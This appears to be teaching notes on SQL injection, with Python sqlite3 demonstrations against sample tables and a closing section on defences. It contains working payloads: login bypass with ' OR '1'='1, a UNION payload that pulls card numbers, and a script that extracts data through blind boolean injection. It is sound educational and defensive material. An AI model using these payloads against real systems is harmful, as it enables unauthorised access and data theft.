Computer Security- SQL Injections
SQL Injections
Database commands are written in SQL. The application builds an SQL command from the user's request, sends it to the database, and the results are fed back to the requester.
Query- result process
Basic SQL commands
Data commands
SELECT- retrieve records
UPDATE- amend existing records in the DB
DELETE- delete records from the DB
INSERT- insert new records into a DB table
DB Structure Commands
CREATE TABLE- add a new table to the DB
DROP TABLE- delete a table
ALTER TABLE ... ADD COLUMN- add a new column to a DB table
So, using SELECT title FROM books WHERE author = 'Dave'
would select the titles from the table books whose author is Dave
SQL Injections
The application expects the user to send a plain value, XYZ, but the attacker sends XYZ plus extra SQL (XYZ + 1). Because the input is pasted straight into the command, the extra SQL is executed.
This causes unexpected results from the DB, which the application then gives to the requester.
SQL attacks based on "always true" cases
The user supplies an ISBN of 105' OR 1=1, so the command becomes SELECT * FROM Books WHERE ISBN = '105' OR 1=1
This makes the WHERE clause true for every row, as 1=1 always holds
As a result every record in Books is returned, not just the one with ISBN 105
Select attacks (login bypass)
SELECT * FROM users WHERE
Username = 'Administrator'
AND password = 'Password'
But instead of inputting your password, input ' OR '1'='1 (or ' OR 1=1 --, where -- comments out the rest of the query)
The password check then becomes always true, so the query returns a row and the login succeeds without knowing the password
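The login bypass and the "always true" case above, as an added example that is not part of the original notes. It uses Python's built-in sqlite3 module with a constructed users table (the table and column names, and the ? placeholder style, are assumptions for this demo); the vulnerable function concatenates the input into the query exactly as the notes describe, and the safe version binds the same input as a parameter so it can never be parsed as SQL.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory DB with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Administrator', 'Password')")
    conn.execute("INSERT INTO users VALUES ('dave', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL by string concatenation: the input becomes part of the command."""
    sql = ("SELECT * FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Same query, but the values are bound as parameters (sqlite3 uses ?).

    The database receives the command and the data separately, so a quote
    or OR 1=1 in the input is compared literally against the stored values."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Normal login: one row.
    print(login_vulnerable(db, "Administrator", "Password"))
    # Password field set to ' OR '1'='1 : WHERE becomes
    # username = 'Administrator' AND password = '' OR '1'='1'
    # and AND binds tighter than OR, so every row matches.
    print(login_vulnerable(db, "Administrator", "' OR '1'='1"))
    # Username field set to Administrator' -- : the password check is commented out.
    print(login_vulnerable(db, "Administrator' --", "wrong"))
    # The same payloads against the parameterised query return nothing.
    print(login_safe(db, "Administrator", "' OR '1'='1"))
    print(login_safe(db, "Administrator' --", "wrong"))
```

The second payload shows why "input OR 1=1" works: AND binds more tightly than OR, so the clause reads (username = 'Administrator' AND password = '') OR ('1'='1'), which is true for every row.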
Union-based attacks
Require more information about the DB (the name of the target table and its columns, and the number of columns in the original SELECT)
Work by appending a UNION command to the existing SELECT query
Consider:
SELECT * FROM Statements WHERE Date > '2013-07-01'
But instead supply the date value as:
2013-07-01' UNION SELECT * FROM cc WHERE CardNumber != '
The resulting command is SELECT * FROM Statements WHERE Date > '2013-07-01' UNION SELECT * FROM cc WHERE CardNumber != ''
So what it is doing is querying statements with a date after the one input, and in the same result set returning every credit card entry from table cc (the trailing quote supplied by the application closes the empty string)
Relies on the table being called cc with a CardNumber column, and on cc having the same number of columns (with compatible types) as Statements, otherwise the UNION is rejected by the DB
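The union attack above, as an added example that is not part of the original notes. It uses sqlite3 with constructed Statements and cc tables (two columns each, an assumption made so the UNION lines up), shows the card numbers appearing in the statement listing, and shows what happens when the attacker guesses the wrong number of columns.

```python
import sqlite3


def make_db():
    """Constructed sample data: statements and a card table with matching column counts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Statements (Id INTEGER, Date TEXT)")
    conn.executemany("INSERT INTO Statements VALUES (?, ?)",
                     [(1, "2013-06-15"), (2, "2013-07-10"), (3, "2013-08-01")])
    conn.execute("CREATE TABLE cc (Holder TEXT, CardNumber TEXT)")
    conn.executemany("INSERT INTO cc VALUES (?, ?)",
                     [("alice", "4111111111111111"), ("bob", "5500000000000004")])
    conn.commit()
    return conn


def statements_after(conn, date):
    """The application's query, with the date concatenated straight in."""
    sql = "SELECT * FROM Statements WHERE Date > '" + date + "'"
    return conn.execute(sql).fetchall()


def try_payload(conn, date):
    """Run the query and return either the rows or the DB's error message.

    A UNION whose column count does not match the original SELECT is
    rejected, which is why the attacker needs to know the DB layout."""
    try:
        return statements_after(conn, date)
    except sqlite3.OperationalError as err:
        return str(err)


if __name__ == "__main__":
    db = make_db()
    # Normal use: statements after 2013-07-01.
    print(statements_after(db, "2013-07-01"))
    # The payload from the notes: the card rows are appended to the result.
    print(statements_after(db, "2013-07-01' UNION SELECT * FROM cc WHERE CardNumber != '"))
    # Wrong guess (one column instead of two): the DB refuses the UNION.
    print(try_payload(db, "2013-07-01' UNION SELECT CardNumber FROM cc WHERE CardNumber != '"))
```

SQLite is lenient about the column types on each side of the UNION; MS SQL Server and PostgreSQL also require the types in each position to be compatible, so in practice the attacker first probes the column count and types (for example with UNION SELECT NULL, NULL, ...) before pulling data.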
Blind SQL Injections
Work by asking the DB yes/no questions: the attacker adds a condition to a query whose normal result is known, and observes whether that result still comes back
Advanced example:
Guessing the version of the SQL DB
Query for the ISBN 0736252588' AND SUBSTRING(@@version, 1, 1) < 'N' --
(@@version holds the version string on MS SQL Server and MySQL; the -- comments out the rest of the original query)
If the book's record is still returned, the condition held, so the first character of the version is before N
If nothing is returned, the character is N or later
In this case the query succeeds, so the character is before N
Trying G next tells us whether it is before or after G
Here the query fails, so the character is G or later, meaning it is between G and M
Trying M with = 'M': the query succeeds
This indicates an MS DB, since @@version on MS SQL Server begins "Microsoft SQL Server"
If the M test had failed, it would be known that the character is between G and L, and the search would continue by halving that range
Repeating the same search for each character position recovers the whole string, one yes/no answer per query
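The blind extraction above, as an added example that is not part of the original notes, generalised from the single "before N" test to a full binary search per character. It uses sqlite3, so substr() and sqlite_version() stand in for SUBSTRING() and @@version (an assumption made so it runs offline); the Books table, its ISBN, and the printable-ASCII range searched are also assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data: one book with a known ISBN."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Books (ISBN TEXT, title TEXT)")
    conn.execute("INSERT INTO Books VALUES ('0736252588', 'Some Book')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, isbn):
    """The application's lookup: the ISBN is concatenated straight into the query."""
    sql = "SELECT title FROM Books WHERE ISBN = '" + isbn + "'"
    return conn.execute(sql).fetchall()


def oracle(conn, condition):
    """One yes/no question: does the known book still come back when
    `condition` is ANDed onto the WHERE clause? The -- drops the trailing quote."""
    payload = "0736252588' AND (" + condition + ") --"
    return len(lookup_vulnerable(conn, payload)) > 0


def extract(conn, expr, max_len=64):
    """Recover the text value of the SQL expression `expr` one character at a
    time, using only '<' comparisons (as in the notes) and a binary search
    over printable ASCII codes 32..126 (assumed)."""
    result = ""
    for i in range(1, max_len + 1):
        # Stop once the string has run out of characters.
        if not oracle(conn, f"length({expr}) >= {i}"):
            break
        lo, hi = 32, 127          # invariant: lo <= code of char i < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(conn, f"substr({expr}, {i}, 1) < char({mid})"):
                hi = mid
            else:
                lo = mid
        result += chr(lo)
    return result


def real_version(conn):
    """What the attacker is trying to learn, fetched directly for comparison."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(oracle(db, "substr(sqlite_version(), 1, 1) < 'N'"))   # the single test from the notes
    print(extract(db, "sqlite_version()"), "==", real_version(db))
```

Each character costs about seven queries, so a version string of a dozen characters takes under a hundred requests; the same oracle works for any expression the DB will evaluate, which is why a single blind boolean condition is enough to read out arbitrary data.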
Defences
Logs: DB and application logs can be checked to see what is happening (quotes, OR 1=1, UNION and comment markers such as -- turning up in input fields are tell-tale signs)
Social context: have there been a few odd calls or support requests around the same time?
Prevention
Give least privileges: the account the application uses to connect to the DB should only be able to read and write the tables it needs, so an injected DROP TABLE or a SELECT from another table fails
Use parameterised queries (prepared statements) so that user input is bound as data and never parsed as part of the SQL command